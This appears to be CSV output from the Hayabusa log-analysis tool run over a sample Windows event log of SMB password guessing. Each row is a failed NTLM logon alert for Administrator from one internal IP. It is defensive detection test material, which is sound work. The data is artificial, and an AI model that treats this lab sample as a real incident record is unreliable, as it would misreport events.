2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5LZo1ljGLOVKhwcC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvY6Q7RGKwjehARC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uKLrHVMevqniTck8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ldxglvKFhLJQ3FV3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRHIAxIj9wFRIg67 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mc7nvfyDfWpnhhBx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NB7Y4gPbxose5TsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yKFU6DJ8Wdtp2qdC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YlbxRctdClWIOjss | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LToi5ANf3tUteu4h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 52YPmYviVPBqJ39Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JpzKsyxEKNLd8l1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r0vd6xEFevamX3jF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WR9gJBoN1ra4NI2M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rGYNVrDBIpMBu9GT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 57qCysbeaXx12CbY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyJl4mHvgtTv53d9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jGBDZCtot2ogcKIO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bBhmbqZIi1gX62mM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o7d4bcBJV1jlRgdt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FtfFb6hMHJiFXxai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: frlsZMDcdb5WaW99 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CFV8UiUTRCCfab9l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZI8P6ZeVRmQlbGtz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmJI7S1nj5hfWZqv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: veh8XInSzXe8E9UD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1BuBHLILZ4afwJC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NN2h7CHnGSCQZXan | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BU3fxfM1qGBJ55HS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q1OlBmhUABabDQbN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6DgQtHG7cT05kRXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUTe3JqVWgDcDcOS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nGKgUOyX3USQlESB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rcIJ8keQvgax1SuL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A7jsyA7bWtVf4sLr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mijnM28fwbgWzkvp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6dNmJo7vkacqxA6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FxvD2OWtadDT1Q2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WK8Esc50KVWIsLU5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U07NeCzXSdx5Nlgs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tObVl72GJse2HCGp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nbEnp2E5a3N78OBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IlRmyinJLWwj5yQg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 92H7tdXinUOxtOLV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Za42EUNuitIXaMBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kz7OtswOreS0fdeS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VMxY1IHx5VuvskM7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d6uxMqLCcqHkuesV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TmeAWYvFEbqJp1rt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tGAdT1CBRYRatVA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0h9ulMPWtj8bEKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eLyLMNv6cOp3sgrq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIAOs16X8nFxV45x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Z4EbyEaUxUEyuiY6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDnW5GABBLbe6eZ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GublgQLD3RXQNmkX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BQRppHTUHAoWPe4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gnh6HFlIW1zWEBu5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ulbcy5PWLYUm5Sy0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L8rkZ7iBMam5o8VJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n39Zox0PFeNirzyT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3u3YUCKxEo5pnKJX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wen3pHM88kSRkHNf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dGDHJ4KMm2zEMV0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKZAB1nfXPYSLxsE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tYkOsX0XDpkdvp01 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9y7HjOeGPcrdj1c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RLwh8Lg3nvbm8Q2p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QoMkBcp8ouIgpX4m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2UnrDiOAOec5DQGQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UxJGLShj5EDKLSDZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iWhaz8W0VLQdXKWN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 82YDxSIBnCAqdK4c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 795b7XqsxokIGJyM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
